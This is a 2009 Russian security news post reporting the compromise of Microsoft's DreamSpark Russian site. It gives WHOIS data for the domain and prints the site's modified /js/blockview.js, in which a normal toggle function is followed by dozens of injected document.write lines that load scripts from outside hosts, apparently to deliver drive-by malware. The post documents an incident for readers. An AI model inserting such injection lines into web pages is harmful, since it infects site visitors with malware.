Информационная безопасность компьютерных систем и защита конфиденциальных данных
SecuRRity.Ru » Уязвимые сайты » Один из проектов компании Microsoft, DreamSpark - был взломан
Уязвимые сайты

Один из проектов компании Microsoft, DreamSpark - был взломан

автор: Administrator | 18 ноября 2009, 02:29 | Просмотров: 7058
теги: Уязвимые сайты, DreamSpark, проект, Microsoft, взломан, Google, сайт, вредоносный код, сервер



Web проект компании Microsoft, DreamSpark - это бесплатный для студентов и аспирантов доступ к полным лицензионным версиям инструментов для разработки и дизайна от компании Microsoft.

Согласно данным поисковой системы Google, 11 ноября 2009, на сайте www.dreamspark.ru было обнаружено:
- 3 сценария для эксплуатации уязвимостей
- 1 троянское приложении
- 1 эксплоит


В настоящий момент, при попытке посетить сайт по ссылке с поисковой системы Google или открыть ресурс в браузере Mozilla Firefox, отображается уведомление о том, что этот сайт может нанести вред Вашему компьютеру:

Предупреждение - посещение этого сайта может нанести вред Вашему компьютеру!:
Один из проектов компании Microsoft, DreamSpark - был взломан


Reported Attack Site!:
Один из проектов компании Microsoft, DreamSpark - был взломан



Проблема в том, что во время последнего просмотра сайта, поисковой бот Google обнаружил, что на компьютер пользователя, открывшего веб-страницу, автоматически и без разрешения, загружается и устанавливается вредоносное программное обеспечение, которое размещено на серверах Dsgрrореrtiеs.соm и Silikаtnу.ru (для обеспечении безопасности и защиты любопытных пользователей, некоторые латинские буквы были заменены на аналогичных русских букв).


Информация о домене DREAMSPARK.RU:

% по данным WHOIS.NIC.RU:
%
% By submitting a query to RU-CENTER's Whois Service
% you agree to abide by the following terms of use:
% http://www.nic.ru/about/servpol.html (in Russian)
% http://www.nic.ru/about/en/servpol.html (in English).

domain:    DREAMSPARK.RU
type:        CORPORATE
nserver:   ns1.msft.net
nserver:   ns3.msft.net
nserver:   ns4.msft.net
state:       REGISTERED, DELEGATED
phone:     +1 4258828080
fax-no:    +1 4259367329
e-mail:      domains@microsoft.com
e-mail:      admin@internationaladmin.com
org:          Microsoft Corporation
registrar:  RUCENTER-REG-RIPN
created:   2008.02.28
paid-till:    2010.02.28
source:     RU-CENTER

Last updated on 2009.11.18 02:53:07 MSK/MSD



Страница диагностики безопасного просмотра Google для сайта dreamspark.ru:
Один из проектов компании Microsoft, DreamSpark - был взломан



Судя по всему был изменен файл /js/blockview.js, который содержит включения данных с других Web сайтов. В настоящий момент этот файл выглядит следующим образом:
function blockview(evt){
        var objectID = (evt.target) ? evt.target.id : ((evt.srcElement) ? evt.srcElement.id : null);
        if(objectID){
        if (document.getElementById(objectID+'text').className  != "Activ"){
                document.getElementById(objectID+'text').className = "Activ";
                document.getElementById(objectID+'line').style.display= "none";    
                document.getElementById(objectID).style.fontWeight= "600";    
            }
            else{
                document.getElementById(objectID+'text').className = "Passiv";
                document.getElementById(objectID+'line').style.display= "block";    
                document.getElementById(objectID).style.fontWeight= "400";    
            }
        }
    }
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://apartmentposts.com/siteadmin/accessk.php ><\/script>');
document.write('<script src=http://nekocafe76.jp/images/gifimg.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://coffeetea.info/album/coffeetea.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://eikefjords.se/dokument/avkommor_leo.php ><\/script>');
document.write('<script src=http://hexforex.com/euro/y_key_e2e918adc43a7caf.php ><\/script>');
document.write('<script src=http://hexforex.com/euro/y_key_e2e918adc43a7caf.php ><\/script>');
document.write('<script src=http://kompsi.com.ru/images/gifimg.php ><\/script>');
document.write('<script src=http://unter-der-dusche.de/1_mannschaft/links.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://dsgproperties.com/images/contactus.php ><\/script>');
document.write('<script src=http://telugumedia.in/telugu/prajasakthi.php ><\/script>');
document.write('<script src=http://telugumedia.in/telugu/prajasakthi.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');
document.write('<script src=http://silikatny.ru/b0d7f546fa69beb5dc0bea547edfb158/robots.php ><\/script>');



Также, на странице диагностики безопасного просмотра Google для сайта www.dreamspark.ru, говорится о том, что предупреждающее сообщение может быть показано потому что, в некоторых случаях, третьи лица могут добавить вредоносный код на вполне законные сайты.




источник:
securitylab.ru
Обратная связь

Информация


Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.